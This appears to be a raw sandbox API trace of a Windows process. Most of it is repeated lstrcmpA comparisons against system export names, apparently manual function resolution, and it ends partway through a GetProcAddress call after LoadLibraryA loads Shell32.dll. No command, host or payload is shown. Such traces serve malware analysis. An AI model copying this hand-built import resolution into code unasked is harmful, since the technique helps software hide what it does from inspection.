lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAInit") returned 1 [0169.634] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAUpdate") returned 1 [0169.634] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 0 [0169.634] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAFinal") returned 1 [0169.634] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAInit") returned 1 [0169.634] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAUpdate") returned 1 [0169.634] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0169.634] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcFreeCompletionListMessage") returned 0 [0169.634] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAFinal") returned 1 [0169.634] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAInit") returned 1 [0169.634] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAUpdate") returned 1 [0169.634] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0169.634] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcFreeCompletionListMessage") returned 1 [0169.634] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcGetCompletionListLastMessageInformation") returned 0 [0169.634] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAFinal") returned 1 [0169.634] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAInit") returned 1 [0169.634] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAUpdate") returned 1 [0169.634] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0169.634] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcFreeCompletionListMessage") returned 1 [0169.634] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0169.634] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListMessageAttributes") returned 0 [0169.634] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAFinal") returned 1 [0169.634] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAInit") returned 1 [0169.634] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAUpdate") returned 1 [0169.635] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0169.635] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcFreeCompletionListMessage") returned 1 [0169.635] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0169.635] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0169.635] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetHeaderSize") returned 0 [0169.635] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAFinal") returned 1 [0169.635] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAInit") returned 1 [0169.635] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0169.635] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0169.635] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0169.635] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0169.635] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0169.635] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0169.635] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 0 [0169.635] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAFinal") returned 1 [0169.635] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAInit") returned 1 [0169.635] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAUpdate") returned 1 [0169.635] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0169.635] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0169.635] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0169.635] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0169.635] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0169.635] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0169.635] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 0 [0169.635] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAFinal") returned 1 [0169.635] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAInit") returned 1 [0169.635] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAUpdate") returned 1 [0169.635] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0169.635] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcFreeCompletionListMessage") returned 1 [0169.635] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0169.635] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0169.636] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetHeaderSize") returned 1 [0169.636] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageAttribute") returned 1 [0169.636] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0169.636] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 0 [0169.636] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAFinal") returned 1 [0169.636] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAInit") returned 1 [0169.636] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0169.636] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0169.636] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0169.636] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0169.636] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0169.636] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0169.636] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 1 [0169.636] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0169.636] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0169.636] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcInitializeMessageAttribute") returned 0 [0169.636] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAFinal") returned 1 [0169.636] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAInit") returned 1 [0169.636] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAUpdate") returned 1 [0169.636] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0169.636] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcFreeCompletionListMessage") returned 1 [0169.636] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0169.636] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0169.636] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetHeaderSize") returned 1 [0169.636] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageAttribute") returned 1 [0169.637] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0169.637] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0169.637] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcInitializeMessageAttribute") returned 1 [0169.637] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcMaxAllowedMessageLength") returned 0 [0169.637] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAFinal") returned 1 [0169.637] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAInit") returned 1 [0169.637] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0169.637] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0169.637] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0169.637] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0169.637] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0169.637] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0169.637] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0169.637] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0169.637] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0169.637] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0169.637] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0169.637] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 0 [0169.637] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0169.637] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0169.637] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0169.637] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0169.637] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0169.637] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0169.637] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0169.637] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0169.637] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0169.637] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0169.638] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0169.638] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0169.638] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0169.638] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0169.638] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 0 [0169.638] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAFinal") returned 1 [0169.638] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAInit") returned 1 [0169.638] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAUpdate") returned 1 [0169.638] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0169.638] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0169.638] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0169.638] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0169.638] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0169.638] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0169.638] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0169.638] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0169.638] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0169.638] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0169.638] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0169.638] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0169.638] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRundownCompletionList") returned 0 [0169.638] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAFinal") returned 1 [0169.638] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAInit") returned 1 [0169.638] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0169.638] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0169.638] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0169.638] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0169.638] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0169.639] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0169.639] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0169.639] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0169.639] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0169.639] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0169.639] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0169.639] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0169.639] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0169.639] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRundownCompletionList") returned 1 [0169.639] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcUnregisterCompletionList") returned 0 [0169.639] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0169.639] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0169.639] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0169.639] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0169.639] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0169.639] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0169.639] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0169.639] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0169.639] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0169.639] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0169.639] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0169.639] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0169.639] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0169.639] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0169.642] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0169.642] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRundownCompletionList") returned 1 [0169.642] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionList") returned 1 [0169.642] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 0 [0169.642] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAFinal") returned 1 [0169.642] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAInit") returned 1 [0169.642] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAUpdate") returned 1 [0169.642] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0169.642] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcFreeCompletionListMessage") returned 1 [0169.642] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0169.642] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0169.642] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetHeaderSize") returned 1 [0169.642] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageAttribute") returned 1 [0169.642] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0169.642] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0169.642] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcInitializeMessageAttribute") returned 1 [0169.642] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0169.642] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionList") returned 1 [0169.642] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0169.642] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRundownCompletionList") returned 1 [0169.642] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionList") returned 1 [0169.642] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0169.642] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ApiSetQueryApiSetPresence") returned 0 [0169.642] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAFinal") returned 1 [0169.642] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAInit") returned 1 [0169.642] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAUpdate") returned 1 [0169.642] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0169.643] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0169.643] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0169.643] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0169.643] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0169.643] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0169.643] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0169.643] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0169.643] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0169.643] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0169.643] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0169.643] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0169.643] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0169.643] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0169.643] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0169.643] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0169.643] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="CsrAllocateCaptureBuffer") returned 0 [0169.643] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAFinal") returned 1 [0169.643] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAInit") returned 1 [0169.643] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAUpdate") returned 1 [0169.643] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0169.643] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0169.643] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0169.643] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0169.643] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetHeaderSize") returned 1 [0169.643] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageAttribute") returned 1 [0169.643] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0169.643] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0169.643] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0169.643] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0169.643] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionList") returned 1 [0169.643] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0169.643] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRundownCompletionList") returned 1 [0169.644] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionList") returned 1 [0169.644] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0169.644] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0169.644] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateCaptureBuffer") returned 1 [0169.644] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateMessagePointer") returned 0 [0169.644] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAFinal") returned 1 [0169.644] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAInit") returned 1 [0169.644] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAUpdate") returned 1 [0169.644] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0169.644] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0169.644] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0169.644] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0169.644] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0169.644] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0169.644] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0169.644] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0169.644] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0169.644] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0169.644] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0169.644] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0169.644] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0169.644] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0169.644] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0172.746] GetProcessHeap () returned 0x580000 [0172.747] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x40b6040 | out: hHeap=0x580000) returned 1 [0172.754] GetProcessHeap () returned 0x580000 [0172.754] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x10) returned 0x5991a0 [0172.754] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x7ffc5cc80000 [0172.754] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 